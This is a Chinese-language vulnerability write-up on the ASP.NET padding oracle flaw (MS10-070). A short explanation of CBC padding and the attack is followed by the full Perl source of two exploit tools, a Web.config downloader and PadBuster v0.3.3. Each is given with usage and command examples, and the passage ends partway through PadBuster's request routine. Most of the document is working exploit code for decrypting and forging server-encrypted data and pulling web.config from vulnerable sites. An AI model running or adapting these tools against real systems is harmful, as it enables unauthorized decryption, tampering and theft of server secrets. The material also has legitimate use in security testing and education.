Padding Oracle

1、漏洞简介


padding oracle又名MS10-070,是ASP.NET中由于加密填充验证过程中处理错误不当,导致存在一个信息泄漏漏洞。成功利用此漏洞的攻击者可以读取服务器加密的数据,例如视图状态。 此漏洞还可以用于数据篡改,如果成功利用,可用于解密和篡改服务器加密的数据。 虽然攻击者无法利用此漏洞来执行恶意攻击代码或直接提升他们的用户权限,但此漏洞可用于信息搜集,这些信息可用于进一步攻击受影响的系统。

2、漏洞成因


在对称加密算法中,密文就是密钥加明文经过加密算法处理的结果。加密算法里面的加密是分块实施的,如DES,RC2等算法。每块固定n(8,16,32)位,有余数的情况一般按照某种规则补足,就是所谓的Padding填充,如常用的PKCS#5规则,就是根据最后一个数据块所缺少的长度来选择填充的内容。为了加强加密的效果,所以会把上一块的密文用 来混淆下一块加密数据,以此类推,用来混淆第一块数据的是预先生成的IV(初始化向量)。

对于加密算法来说,它们是基于等长的“数据块”进行操作的(如对于RC2,DES或TripleDES算法来说这个长度是8字节,而对于Rijndael算法来说则是16、24或32字节)。但是我们的输入数据长度是不规则的,因此必然需要进行“填充”才能形成完整的块,通过这种规则我们便可以根据填充的内容来得知填充的长度,以便在解密后去除填充的字节。

一个密文被解密时也是分段进行的,在解密完成之后算法会先检查是否符合规则,如果它的Padding填充方式不符合规则,那么表示输入数据有问题。对于解密的类库来说,往往便会抛出一个PaddingError异常,提示Padding不正确。

在PaddingOracle攻击中,黑客只需要一个合法密文,即可通过不断向网站发送篡改过的密文(这个过程主要是构造IV的过程),观察是否有Padding异常错误提示,网站中的异常错误提示可能直接显示在网页当中,也可能只是HTTP状态码,根据两个不同的HTTP状态码做对比即可,而不需要其他任何详细信息。如果有异常错误提示即可不断地给网站程序提供密文,让解密程序给出错误提示,再而不断地修正,从而最终获得混淆之前的中间密文。拿到中间密文之后,可以通过构造IV,使得中间密文被逆向混淆之后得到的明文为指定内容,从而达到攻击的目的。在这过程中PaddingOracle攻击并没有破解掉加密算法的密钥,也没有能力对任意密文做逆向解密,只是可以利用一个有效密文,生成一个解密后得到任意指定内容明文的伪造密文。

3、漏洞检测及利用


漏洞检测利用工具padBuster.pl与Webconfig Bruter.pl。

Webconfig Bruter.pl

# Source: http://blog.mindedsecurity.com/2010/10/breaking-net-encryption-with-or-without.html
 
#!/usr/bin/perl
#
#
#  Webconfig Bruter - exploit tool for downloading Web.config
#
#  FOr use this script you need Pudbuster.
#  Padbuster is a great tool and Brian Holyfield deserve all the credits.
#  Note from Exploit-db: This very first exploit was meant to work with Padbusterdornet or Padbuster v0.2.
#  A similar exploitation vector was also added lately in Padbuster v0.3:
#  http://www.gdssecurity.com/l/b/2010/10/04/padbuster-v0-3-and-the-net-padding-oracle-attack/
#  http://www.exploit-db.com/sploits/padBuster.pl
#
#
#  Giorgio Fedon - ([email protected])
#   
use LWP::UserAgent;
use strict;
use Getopt::Std;
use MIME::Base64;
use URI::Escape;
use Getopt::Long;
#Definition of vars for .NET
my $toEncodeDecode;
my $b64Encoded;
my $string;
my $returnVal;
my $testUrl;
my $testBytes;
my $sampleBytes;
my $testUrl = @ARGV[0]."\?d\=";
my $sampleBytes = @ARGV[1];
my $blockSize = @ARGV[2];
if ($#ARGV < 2) {
 die "   
  Use: Web.config_bruter.pl ScriptResourceUrl Encrypted_Sample BlockSize
  Where: URL = The target URL (and query string if applicable)
         EncryptedSample = The encrypted value you want to use.
         This need to come from Padbuster.
         BlockSize = The block size being used by the algorithm (8 or 16)
         Poc code by giorgio.fedon\@mindedsecurity.com
  Original Padbuster code from Brian Holyfield - Gotham Digital Science
 
Command Example:
./Web.config_bruter.pl https://127.0.0.1:8083/ScriptResource.axd  d1ARvno0iSA6Ez7Z0GEAmAy3BpX8a2 16
 
";}
 
my $method = "GET";
$sampleBytes = encoder($sampleBytes, 1);
my $testBytes = "\x00" x $blockSize;
my $counter = 0;
# Use random bytes
my @nums = (0..255);
my $status = 1;
  while ($status)
  {
   # Fuzz the test bytes
   for (my $byteNum = $blockSize - 1; $byteNum >= 0; $byteNum--)
   {
   substr($testBytes, $byteNum, 1, chr($nums[rand(@nums)]));
                  }     
 
                   # Combine the test bytes and the sample
   my $combinedTestBytes = encoder($testBytes.$sampleBytes, 0);
   chomp($combinedTestBytes);
   $combinedTestBytes =~ s/\%0A//g;
   # Ok, now make the request
   my ($status, $content, $location, $contentLength) = makeRequest($method, $testUrl.$combinedTestBytes);
   if ($status == "200")
   {
   # Remove this for "T" exploit
   if (index($content,"parent\.Sys\.Application") == -1)
   {
   print $content."\n\n";
   print "Total Requests:".$counter."\n\n";
   print "Resulting Exploit Block:".$combinedTestBytes."\n\n";
   last;
   }
   }
   $counter++;
   }
# The following code is taken from PadBuster. Credit: Brian Holyfield - Gotham Digital Science
#
# I also did the encoder / decoder, but your logic is definitely better
sub encoder
{
my ($toEncodeDecode, $oper) = @_;
 # UrlDecoder Encoder
 if ($oper == 1)
   {
$toEncodeDecode =~ s/\-/\+/g;
$toEncodeDecode =~ s/\_/\//g;
my $count = chop($toEncodeDecode);
$toEncodeDecode = $toEncodeDecode.("=" x int($count));
$returnVal = decode_base64($toEncodeDecode);
   }
   else
   {
$b64Encoded = encode_base64($toEncodeDecode);
$b64Encoded =~ s/(\r|\n)//g;
$b64Encoded =~ s/\+/\-/g;
$b64Encoded =~ s/\//\_/g;
my $count = $b64Encoded =~ s/\=//g;
($count eq "") ? ($count = 0) : "";
$returnVal = $b64Encoded.$count;
   }
 
 return $returnVal;
}
sub makeRequest {
 my ($method, $url) = @_;
 my ($lwp, $status, $content, $req, $location, $contentLength);  
 
 # Setup LWP UserAgent
 $lwp = LWP::UserAgent->new(env_proxy => 1,
                            keep_alive => 1,
                            timeout => 30,
       requests_redirectable => [],
                            );
 
 $req = new HTTP::Request $method => $url;
 
 my $response = $lwp->request($req);
 
 # Extract the required attributes from the response
 $status = substr($response->status_line, 0, 3);
 $content = $response->content;
 #print $content;
 $location = $response->header("Location");
 if ($location eq "")
 {
  $location = "N/A";
 }
 $contentLength = $response->header("Content-Length");
 return ($status, $content, $location, $contentLength);
}

padBuster.pl

#!/usr/bin/perl
#
# PadBuster v0.3.3 - Automated script for performing Padding Oracle attacks
# Brian Holyfield - Gotham Digital Science ([email protected])
#
# Credits to J.Rizzo and T.Duong for providing proof of concept web exploit
# techniques and S.Vaudenay for initial discovery of the attack. Credits also
# to James M. Martin ([email protected]) for sharing proof of concept exploit
# code for performing various brute force attack techniques, and wireghoul (Eldar 
# Marcussen) for making code quality improvements.  
# 
 
use LWP::UserAgent;
use strict;
use warnings;
use Getopt::Std;
use MIME::Base64;
use URI::Escape;
use Getopt::Long;
use Time::HiRes qw( gettimeofday );
use Compress::Zlib;
use Crypt::SSLeay;
 
# Set defaults with $variable = value
my $logFiles;
my $post;
my $encoding = 0;
my $headers;
my $cookie;
my $error;
my $prefix;
my $intermediaryInput;
my $cipherInput;
my $plainTextInput;
my $encodedPlainTextInput;
my $noEncodeOption;
my $superVerbose;
my $proxy;
my $proxyAuth;
my $noIv;
my $auth;
my $resumeBlock;
my $interactive = 0;
my $bruteForce;
my $ignoreContent;
my $useBody;
my $verbose;
 
GetOptions( "log" => \$logFiles,
            "post=s" => \$post,
            "encoding=s" => \$encoding,
            "headers=s" => \$headers,
            "cookies=s" => \$cookie,
            "error=s" => \$error,
            "prefix=s" => \$prefix,
            "intermediate=s" => \$intermediaryInput,
            "ciphertext=s" => \$cipherInput,
            "plaintext=s" => \$plainTextInput,
	    "encodedtext=s" => \$encodedPlainTextInput,
            "noencode" => \$noEncodeOption,
            "veryverbose" => \$superVerbose,
            "proxy=s" => \$proxy,
            "proxyauth=s" => \$proxyAuth,
            "noiv" => \$noIv,
            "auth=s" => \$auth,
            "resume=s" => \$resumeBlock,
            "interactive" => \$interactive,
            "bruteforce" => \$bruteForce,
            "ignorecontent" => \$ignoreContent,
            "usebody" => \$useBody,
            "verbose" => \$verbose);
 
print "\n+-------------------------------------------+\n";
print "| PadBuster - v0.3.3                        |\n";
print "| Brian Holyfield - Gotham Digital Science  |\n";
print "| labs\@gdssecurity.com                      |\n";
print "+-------------------------------------------+\n";
 
if ($#ARGV < 2) { 
 die "    
    Use: padBuster.pl URL EncryptedSample BlockSize [options]
  Where: URL = The target URL (and query string if applicable)
         EncryptedSample = The encrypted value you want to test. Must
                           also be present in the URL, PostData or a Cookie
         BlockSize = The block size being used by the algorithm
Options:
	 -auth [username:password]: HTTP Basic Authentication 
	 -bruteforce: Perform brute force against the first block 
	 -ciphertext [Bytes]: CipherText for Intermediate Bytes (Hex-Encoded)
         -cookies [HTTP Cookies]: Cookies (name1=value1; name2=value2)
         -encoding [0-4]: Encoding Format of Sample (Default 0)
                          0=Base64, 1=Lower HEX, 2=Upper HEX
                          3=.NET UrlToken, 4=WebSafe Base64
         -encodedtext [Encoded String]: Data to Encrypt (Encoded)
         -error [Error String]: Padding Error Message
         -headers [HTTP Headers]: Custom Headers (name1::value1;name2::value2)
	 -interactive: Prompt for confirmation on decrypted bytes
	 -intermediate [Bytes]: Intermediate Bytes for CipherText (Hex-Encoded)
	 -log: Generate log files (creates folder PadBuster.DDMMYY)
	 -noencode: Do not URL-encode the payload (encoded by default)
	 -noiv: Sample does not include IV (decrypt first block) 
         -plaintext [String]: Plain-Text to Encrypt
         -post [Post Data]: HTTP Post Data String
	 -prefix [Prefix]: Prefix bytes to append to each sample (Encoded) 
	 -proxy [address:port]: Use HTTP/S Proxy
	 -proxyauth [username:password]: Proxy Authentication
	 -resume [Block Number]: Resume at this block number
	 -usebody: Use response body content for response analysis phase
         -verbose: Be Verbose
         -veryverbose: Be Very Verbose (Debug Only)
 
";}
 
# Ok, if we've made it this far we are ready to begin..
my $url = $ARGV[0];
my $sample = $ARGV[1];
my $blockSize = $ARGV[2];
 
if ($url eq "" || $sample eq "" || $blockSize eq "") {
	print "\nERROR: The URL, EncryptedSample and BlockSize cannot be null.\n";
	exit();
}
 
# Hard Coded Inputs
#$post = "";
#$sample = "";
 
my $method = $post ? "POST" : "GET";
 
# These are file related variables
my $dirName = "PadBuster." . &getTime("F");
my $dirSlash = "/";
my $dirCmd = "mkdir ";
if (defined($ENV{'OS'})) {
 if ($ENV{OS} =~ /Windows/) {
  $dirSlash = "\\";
  $dirCmd = "md ";
 }
}
my $dirExists = 0;
my $printStats = 0;
my $requestTracker = 0;
my $timeTracker = 0;
 
if ($encoding < 0 || $encoding > 4) {
	print "\nERROR: Encoding must be a value between 0 and 4\n";
	exit();
} 
my $encodingFormat = $encoding ? $encoding : 0;
 
my $encryptedBytes = $sample;
my $totalRequests = 0;
 
# See if the sample needs to be URL decoded, otherwise don't (the plus from B64 will be a problem)
if ($sample =~ /\%/) {
	$encryptedBytes = &uri_unescape($encryptedBytes)
}
 
# Prep the sample for regex use
$sample = quotemeta $sample;
 
# Now decode
$encryptedBytes = &myDecode($encryptedBytes, $encodingFormat);
if ( (length($encryptedBytes) % $blockSize) > 0) {
	print "\nERROR: Encrypted Bytes must be evenly divisible by Block Size ($blockSize)\n";
	print "       Encrypted sample length is ".int(length($encryptedBytes)).". Double check the Encoding and Block Size.\n";
	exit();
}
 
# If no IV, then append nulls as the IV (only if decrypting)
if ($noIv && !$bruteForce && !$plainTextInput) {
	$encryptedBytes = "\x00" x $blockSize . $encryptedBytes;
}
 
# PlainTextBytes is where the complete decrypted sample will be stored (decrypt only)
my $plainTextBytes;
 
# This is a bool to make sure we know where to replace the sample string
my $wasSampleFound = 0;
 
# ForgedBytes is where the complete forged sample will be stored (encrypt only)
my $forgedBytes;
 
# Isolate the IV into a separate byte array
my $ivBytes = substr($encryptedBytes, 0, $blockSize);
 
# Declare some optional elements for storing the results of the first test iteration
# to help the user if they don't know what the padding error looks like
my @oracleCantidates;
my $oracleSignature = "";
my %oracleGuesses;
my %responseFileBuffer;
 
# The block count should be the sample divided by the blocksize
my $blockCount = int(length($encryptedBytes)) / int($blockSize);
 
if (!$bruteForce && !$plainTextInput && $blockCount < 2) {
	print "\nERROR: There is only one block. Try again using the -noiv option.\n";
	exit();
}
 
# The attack works by sending in a real cipher text block along with a fake block in front of it
# You only ever need to send two blocks at a time (one real one fake) and just work through
# the sample one block at a time
 
 
# First, re-issue the original request to let the user know if something is potentially broken
my ($status, $content, $location, $contentLength) = &makeRequest($method, $url, $post, $cookie);
 
&myPrint("\nINFO: The original request returned the following",0);
&myPrint("[+] Status: $status",0);	
&myPrint("[+] Location: $location",0);
&myPrint("[+] Content Length: $contentLength\n",0);
&myPrint("[+] Response: $content\n",1);
 
$plainTextInput = &myDecode($encodedPlainTextInput,$encodingFormat) if $encodedPlainTextInput;
 
if ($bruteForce) {
	&myPrint("INFO: Starting PadBuster Brute Force Mode",0);
	my $bfAttempts = 0;
 
	print "INFO: Resuming previous brute force at attempt $resumeBlock\n" if $resumeBlock;
 
	# Only loop through the first 3 bytes...this should be enough as it 
	# requires 16.5M+ requests
 
	my @bfSamples;
	my $sampleString = "\x00" x 2;
	for my $c (0 ... 255) {
	 substr($sampleString, 0, 1, chr($c));
	 for my $d (0 ... 255) {
	  substr($sampleString, 1, 1, chr($d));
	  push (@bfSamples, $sampleString);
	 }
	}
 
	foreach my $testVal (@bfSamples) {
	 my $complete = 0;
	 while ($complete == 0) {
	  my $repeat = 0;
	  for my $b (0 ... 255) {
  	   $bfAttempts++;  	   
  	   if ( $resumeBlock && ($bfAttempts < ($resumeBlock - ($resumeBlock % 256)+1)) ) {
		   #SKIP
	   } else {
		   my $testBytes = chr($b).$testVal;
		   $testBytes .= "\x00" x ($blockSize-3);
 
		   my $combinedBf = $testBytes;  
		   $combinedBf .= $encryptedBytes;
		   $combinedBf = &myEncode($combinedBf, $encoding);
 
		   # Add the Query String to the URL
		   my ($testUrl, $testPost, $testCookies) = &prepRequest($url, $post, $cookie, $sample, $combinedBf);  	  
 
 
		   # Issue the request
		   my ($status, $content, $location, $contentLength) = &makeRequest($method, $testUrl, $testPost, $testCookies);
 
		   my $signatureData = "$status\t$contentLength\t$location";
		   $signatureData = "$status\t$contentLength\t$location\t$content" if $useBody;
 
		   if ($oracleSignature eq "") {
			&myPrint("[+] Starting response analysis...\n",0) if ($b ==0);
			$oracleGuesses{$signatureData}++;
			$responseFileBuffer{$signatureData} = "Status: $status\nLocation: $location\nContent-Length: $contentLength\nContent:\n$content";
			if ($b == 255) {
				&myPrint("*** Response Analysis Complete ***\n",0);
				&determineSignature();
				$printStats = 1;
				$timeTracker = 0;
				$requestTracker = 0;
				$repeat = 1;
				$bfAttempts = 0;
			}
		   }
		   if ($oracleSignature ne "" && $oracleSignature ne $signatureData) {
			&myPrint("\nAttempt $bfAttempts - Status: $status - Content Length: $contentLength\n$testUrl\n",0);
			&writeFile("Brute_Force_Attempt_".$bfAttempts.".txt", "URL: $testUrl\nPost Data: $testPost\nCookies: $testCookies\n\nStatus: $status\nLocation: $location\nContent-Length: $contentLength\nContent:\n$content");
		   }
	   }
	  }
	  ($repeat == 1) ? ($complete = 0) : ($complete = 1);
	 } 
	}  
} elsif ($plainTextInput) {
	# ENCRYPT MODE
	&myPrint("INFO: Starting PadBuster Encrypt Mode",0);
 
	# The block count will be the plaintext divided by blocksize (rounded up)	
	my $blockCount = int(((length($plainTextInput)+1)/$blockSize)+0.99);
	&myPrint("[+] Number of Blocks: ".$blockCount."\n",0);
 
	my $padCount = ($blockSize * $blockCount) - length($plainTextInput);	
	$plainTextInput.= chr($padCount) x $padCount;
 
	# SampleBytes is the encrypted text you want to derive intermediate values for, so 
	# copy the current ciphertext block into sampleBytes
	# Note, nulls are used if not provided and the intermediate values are brute forced
 
	$forgedBytes = $cipherInput ? &myDecode($cipherInput,1) : "\x00" x $blockSize;
	my $sampleBytes = $forgedBytes;
 
	for (my $blockNum = $blockCount; $blockNum > 0; $blockNum--) { 	
		# IntermediaryBytes is where the intermediate bytes produced by the algorithm are stored
		my $intermediaryBytes;
 
		if ($intermediaryInput && $blockNum == $blockCount) {
			$intermediaryBytes = &myDecode($intermediaryInput,2);
		} else {
			$intermediaryBytes = &processBlock($sampleBytes);
		}
 
	        # Now XOR the intermediate bytes with the corresponding bytes from the plain-text block
	        # This will become the next ciphertext block (or IV if the last one)
	        $sampleBytes = $intermediaryBytes ^ substr($plainTextInput, (($blockNum-1) * $blockSize), $blockSize);
		$forgedBytes = $sampleBytes.$forgedBytes;
 
		&myPrint("\nBlock ".($blockNum)." Results:",0);
		&myPrint("[+] New Cipher Text (HEX): ".&myEncode($sampleBytes,1),0);
		&myPrint("[+] Intermediate Bytes (HEX): ".&myEncode($intermediaryBytes,1)."\n",0);
 
	}
	$forgedBytes = &myEncode($forgedBytes, $encoding);
	chomp($forgedBytes);
} else {
	# DECRYPT MODE
	&myPrint("INFO: Starting PadBuster Decrypt Mode",0);
 
	if ($resumeBlock) {
		&myPrint("INFO: Resuming previous exploit at Block $resumeBlock\n",0);
	} else {
		$resumeBlock = 1
	}
 
	# Assume that the IV is included in our sample and that the first block is the IV	
	for (my $blockNum = ($resumeBlock+1); $blockNum <= $blockCount; $blockNum++) { 
		# Since the IV is the first block, our block count is artificially inflated by one
		&myPrint("*** Starting Block ".($blockNum-1)." of ".($blockCount-1)." ***\n",0);
 
		# SampleBytes is the encrypted text you want to break, so 
		# lets copy the current ciphertext block into sampleBytes
		my $sampleBytes = substr($encryptedBytes, ($blockNum * $blockSize - $blockSize), $blockSize);
 
		# IntermediaryBytes is where the the intermediary bytes produced by the algorithm are stored
		my $intermediaryBytes = &processBlock($sampleBytes);
 
		# DecryptedBytes is where the decrypted block is stored
		my $decryptedBytes;			        	
 
		# Now we XOR the decrypted byte with the corresponding byte from the previous block
		# (or IV if we are in the first block) to get the actual plain-text
		$blockNum == 2 ? $decryptedBytes = $intermediaryBytes ^ $ivBytes : $decryptedBytes = $intermediaryBytes ^ substr($encryptedBytes, (($blockNum - 2) * $blockSize), $blockSize);
 
		&myPrint("\nBlock ".($blockNum-1)." Results:",0);
		&myPrint("[+] Cipher Text (HEX): ".&myEncode($sampleBytes,1),0);
		&myPrint("[+] Intermediate Bytes (HEX): ".&myEncode($intermediaryBytes,1),0);
		&myPrint("[+] Plain Text: $decryptedBytes\n",0);
		$plainTextBytes = $plainTextBytes.$decryptedBytes;
	}
}
 
&myPrint("-------------------------------------------------------",0);	
&myPrint("** Finished ***\n", 0);
if ($plainTextInput) {
	&myPrint("[+] Encrypted value is: ".&uri_escape($forgedBytes),0);
} else {	
	&myPrint("[+] Decrypted value (ASCII): $plainTextBytes\n",0);
	&myPrint("[+] Decrypted value (HEX): ".&myEncode($plainTextBytes,2)."\n", 0);
	&myPrint("[+] Decrypted value (Base64): ".&myEncode($plainTextBytes,0)."\n", 0);
}
&myPrint("-------------------------------------------------------\n",0);	
 
sub determineSignature { 
	# Help the user detect the oracle response if an error string was not provided
	# This logic will automatically suggest the response pattern that occured most often 
	# during the test as this is the most likeley one
 
	my @sortedGuesses = sort {$oracleGuesses{$a} <=> $oracleGuesses{$b}} keys %oracleGuesses; 
 
	&myPrint("The following response signatures were returned:\n",0);
	&myPrint("-------------------------------------------------------",0);
	if ($useBody) {
		&myPrint("ID#\tFreq\tStatus\tLength\tChksum\tLocation",0);
	} else 	{
		&myPrint("ID#\tFreq\tStatus\tLength\tLocation",0);
	}
	&myPrint("-------------------------------------------------------",0);
 
	my $id = 1;
 
	foreach (@sortedGuesses) {
		my $line = $id;
		($id == $#sortedGuesses+1 && $#sortedGuesses != 0) ? $line.= " **" : $line.="";
		my @sigFields = split("\t", $_);
		$line .= "\t$oracleGuesses{$_}\t$sigFields[0]\t$sigFields[1]";
		$useBody ? ( $line .= "\t".unpack( '%32A*', $sigFields[3] ) ) : $line.="";
		$line .= "\t$sigFields[2]";
		&myPrint($line,0);
		&writeFile("Response_Analysis_Signature_".$id.".txt", $responseFileBuffer{$_});
		$id++;
	}
	&myPrint("-------------------------------------------------------",0);	
 
	if ($#sortedGuesses == 0 && !$bruteForce) {
		&myPrint("\nERROR: All of the responses were identical.\n",0);
		&myPrint("Double check the Block Size and try again.",0);
		exit();
	} else {
		my $responseNum = &promptUser("\nEnter an ID that matches the error condition\nNOTE: The ID# marked with ** is recommended");
		&myPrint("\nContinuing test with selection $responseNum\n",0);
		$oracleSignature = $sortedGuesses[$responseNum-1];
	}
}
 
sub prepRequest {
	my ($pUrl, $pPost, $pCookie, $pSample, $pTestBytes) = @_;
 
	# Prepare the request			
	my $testUrl = $pUrl;
	my $wasSampleFound = 0;
 
	if ($pUrl =~ /$pSample/) {
		$testUrl =~ s/$pSample/$pTestBytes/;
		$wasSampleFound = 1;
	} 
 
	my $testPost = "";						
	if ($pPost) {
		$testPost = $pPost;
		if ($pPost =~ /$pSample/) {
			$testPost =~ s/$pSample/$pTestBytes/;
			$wasSampleFound = 1;
		}
	}
 
	my $testCookies = "";
	if ($pCookie) {
		$testCookies = $pCookie;
		if ($pCookie =~ /$pSample/) {
			$testCookies =~ s/$pSample/$pTestBytes/;
			$wasSampleFound = 1;
		}
	}
 
	if ($wasSampleFound == 0) {
		&myPrint("ERROR: Encrypted sample was not found in the test request",0);
		exit();
	}
	return ($testUrl, $testPost, $testCookies);
}
 
sub processBlock {
  	my ($sampleBytes) = @_; 
  	my $analysisMode;
  	# Analysis mode is either 0 (response analysis) or 1 (exploit)  	
  	$analysisMode = (!$error && $oracleSignature eq "") ? 0 : 1;
 
  	# The return value of this subroutine is the intermediate text for the block
	my $returnValue;
 
  	my $complete = 0;
  	my $autoRetry = 0;
  	my $hasHit = 0;
 
  	while ($complete == 0) {
  		# Reset the return value
  		$returnValue = "";
 
  		my $repeat = 0;
 
		# TestBytes are the fake bytes that are pre-pending to the cipher test for the padding attack
		my $testBytes = "\x00" x $blockSize;
 
		my $falsePositiveDetector = 0;
 
		# Work on one byte at a time, starting with the last byte and moving backwards
		OUTERLOOP:
		for (my $byteNum = $blockSize - 1; $byteNum >= 0; $byteNum--) {
			INNERLOOP:
			for (my $i = 255; $i >= 0; $i--) {			
				# Fuzz the test byte
				substr($testBytes, $byteNum, 1, chr($i));
 
				# Combine the test bytes and the sample
				my $combinedTestBytes = $testBytes.$sampleBytes;
 
				if ($prefix) {
					$combinedTestBytes = &myDecode($prefix,$encodingFormat).$combinedTestBytes 
				}
 
				$combinedTestBytes = &myEncode($combinedTestBytes, $encodingFormat);				
				chomp($combinedTestBytes);
 
				if (! $noEncodeOption) {
					$combinedTestBytes = &uri_escape($combinedTestBytes); 
				}
 
				my ($testUrl, $testPost, $testCookies) = &prepRequest($url, $post, $cookie, $sample, $combinedTestBytes);
 
				# Ok, now make the request
 
				my ($status, $content, $location, $contentLength) = &makeRequest($method, $testUrl, $testPost, $testCookies);
 
 
				my $signatureData = "$status\t$contentLength\t$location";
				$signatureData = "$status\t$contentLength\t$location\t$content" if $useBody;
 
				# If this is the first block and there is no padding error message defined, then cycle through 
				# all possible requests and let the user decide what the padding error behavior is.
				if ($analysisMode == 0) {
					&myPrint("INFO: No error string was provided...starting response analysis\n",0) if ($i == 255);
					$oracleGuesses{$signatureData}++;
 
					$responseFileBuffer{$signatureData} = "URL: $testUrl\nPost Data: $testPost\nCookies: $testCookies\n\nStatus: $status\nLocation: $location\nContent-Length: $contentLength\nContent:\n$content";
 
					if ($byteNum == $blockSize - 1 && $i == 0) {
						&myPrint("*** Response Analysis Complete ***\n",0);
						&determineSignature();
						$analysisMode = 1;
						$repeat = 1;
						last OUTERLOOP;
					}
				}
 
				my $continue = "y";
 
				if (($error && $content !~ /$error/) || ($oracleSignature ne "" && $oracleSignature ne $signatureData)) {
					# This is for autoretry logic (only works on the first byte)
					if ($autoRetry == 1 &&  ($byteNum == ($blockSize - 1) ) && $hasHit == 0 ) {
						$hasHit++;
					} else {
						# If there was no padding error, then it worked
						&myPrint("[+] Success: (".abs($i-256)."/256) [Byte ".($byteNum+1)."]",0);
						&myPrint("[+] Test Byte:".&uri_escape(substr($testBytes, $byteNum, 1)),1);
 
						# If continually getting a hit on attempt zero, then something is probably wrong
						$falsePositiveDetector++ if ($i == 255);
 
						if ($interactive == 1) {
							$continue = &promptUser("Do you want to use this value (Yes/No/All)? [y/n/a]","",1);
						}
 
						if ($continue eq "y" || $continue eq "a") {
							$interactive = 0 if ($continue eq "a");
 
							# Next, calculate the decrypted byte by XORing it with the padding value
							my ($currentPaddingByte, $nextPaddingByte);
 
							# These variables could allow for flexible padding schemes (for now PCKS)
							# For PCKS#7, the padding block is equal to chr($blockSize - $byteNum)
							$currentPaddingByte = chr($blockSize - $byteNum);
							$nextPaddingByte = chr($blockSize - $byteNum + 1);
 
							my $decryptedByte = substr($testBytes, $byteNum, 1) ^ $currentPaddingByte;
							&myPrint("[+] XORing with Padding Char, which is ".&uri_escape($currentPaddingByte),1);
 
							$returnValue = $decryptedByte.$returnValue;
							&myPrint("[+] Decrypted Byte is: ".&uri_escape($decryptedByte),1);
 
							# Finally, update the test bytes in preparation for the next round, based on the padding used 
							for (my $k = $byteNum; $k < $blockSize; $k++) {
								# First, XOR the current test byte with the padding value for this round to recover the decrypted byte
								substr($testBytes, $k, 1,(substr($testBytes, $k, 1) ^ $currentPaddingByte));				
 
								# Then, XOR it again with the padding byte for the next round
								substr($testBytes, $k, 1,(substr($testBytes, $k, 1) ^ $nextPaddingByte));
							}
							last INNERLOOP;                        
						}
 
					}
				}
 
				## TODO: Combine these two blocks?
				if ($i == 0 && $analysisMode == 1) {
					# End of the road with no success.  We should probably try again.
					&myPrint("ERROR: No matching response on [Byte ".($byteNum+1)."]",0);
 
					if ($autoRetry == 0) {
						$autoRetry = 1;
						&myPrint("       Automatically trying one more time...",0);
						$repeat = 1;
						last OUTERLOOP;
 
					} else {
						if (($byteNum == $blockSize - 1) && ($error)) {
							&myPrint("\nAre you sure you specified the correct error string?",0);
							&myPrint("Try re-running without the -e option to perform a response analysis.\n",0);
						} 
 
						$continue = &promptUser("Do you want to start this block over? (Yes/No)? [y/n/a]","",1);
						if ($continue ne "n") {
							&myPrint("INFO: Switching to interactive mode",0);
							$interactive = 1;
							$repeat = 1;
							last OUTERLOOP;
						}					
					}
				}   
				if ($falsePositiveDetector == $blockSize) {
					&myPrint("\n*** ERROR: It appears there are false positive results. ***\n",0);
					&myPrint("HINT: The most likely cause for this is an incorrect error string.\n",0);
					if ($error) {
						&myPrint("[+] Check the error string you provided and try again, or consider running",0);
						&myPrint("[+] without an error string to perform an automated response analysis.\n",0);
					} else {
						&myPrint("[+] You may want to consider defining a custom padding error string",0);
						&myPrint("[+] instead of the automated response analysis.\n",0);
					}
					$continue = &promptUser("Do you want to start this block over? (Yes/No)? [y/n/a]","",1);
					if ($continue eq "y") {
						&myPrint("INFO: Switching to interactive mode",0);
						$interactive = 1;
						$repeat = 1;
						last OUTERLOOP;
					}
				}
			} 
		}
		($repeat == 1) ? ($complete = 0) : ($complete = 1);
	}
	return $returnValue;
}
 
sub makeRequest {
 
 my ($method, $url, $data, $cookie) = @_; 
 my ($noConnect, $lwp, $status, $content, $req, $location, $contentLength);   
 my $numRetries = 0;
 $data ='' unless $data;
 $cookie='' unless $cookie;
 
 $requestTracker++;
 do {
  #Quick hack to avoid hostname in URL when using a proxy with SSL (this will get re-set later if needed)
  $ENV{HTTPS_PROXY} = "";
 
  $lwp = LWP::UserAgent->new(env_proxy => 1,
                            keep_alive => 1,
                            timeout => 30,
			    requests_redirectable => [],
                            );
 
  $req = new HTTP::Request $method => $url;
 
  &myPrint("Request:\n$method\n$url\n$data\n$cookie",0) if $superVerbose;
 
  # Add request content for POST and PUTS 
  if ($data) {
   $req->content_type('application/x-www-form-urlencoded');
   $req->content($data);
  }
 
  if ($proxy) {
  	my $proxyUrl = "http://";
  	if ($proxyAuth) {
 		my ($proxyUser, $proxyPass) = split(":",$proxyAuth);
 		$ENV{HTTPS_PROXY_USERNAME}	= $proxyUser;
		$ENV{HTTPS_PROXY_PASSWORD}	= $proxyPass;
		$proxyUrl .= $proxyAuth."@";
 	}
 	$proxyUrl .= $proxy;
 	$lwp->proxy(['http'], "http://".$proxy);
	$ENV{HTTPS_PROXY} = "http://".$proxy;
  } 	
 
 
  if ($auth) {
   my ($httpuser, $httppass) = split(/:/,$auth);
   $req->authorization_basic($httpuser, $httppass);
  }
 
  # If cookies are defined, add a COOKIE header
  if (! $cookie eq "") {
   $req->header(Cookie => $cookie);
  }
 
  if ($headers) {
   my @customHeaders = split(/;/i,$headers);
   for (my $i = 0; $i <= $#customHeaders; $i++) {
    my ($headerName, $headerVal) = split(/\::/i,$customHeaders[$i]);
    $req->header($headerName, $headerVal);
   }
  }
 
  my $startTime = &gettimeofday();
  my $response = $lwp->request($req);
  my $endTime = &gettimeofday();  
  $timeTracker = $timeTracker + ($endTime - $startTime);
 
  if ($printStats == 1 && $requestTracker % 250 == 0) {
  	print "[+] $requestTracker Requests Issued (Avg Request Time: ".(sprintf "%.3f", $timeTracker/100).")\n";
  	$timeTracker = 0;
  }
 
 
  # Extract the required attributes from the response
  $status = substr($response->status_line, 0, 3);
  $content = $response->content;
 
  &myPrint("Response Content:\n$content",0) if $superVerbose;
  $location = $response->header("Location");
  if (!$location)   {
   $location = "N/A";
  }
  #$contentLength = $response->header("Content-Length");
  $contentLength = length($content);
 
 
  my $contentEncoding = $response->header("Content-Encoding");
  if ($contentEncoding) {
   if ($contentEncoding =~ /GZIP/i ) {
    	$content = Compress::Zlib::memGunzip($content);
  	$contentLength = length($content);
   }
  }
 
  my $statusMsg = $response->status_line;
  #myPrint("Status: $statusMsg, Location: $location, Length: $contentLength",1); 
 
  if ($statusMsg =~ /Can't connect/) {
   print "ERROR: $statusMsg\n   Retrying in 10 seconds...\n\n";
   $noConnect = 1;
   $numRetries++;
   sleep 10;
  } else {
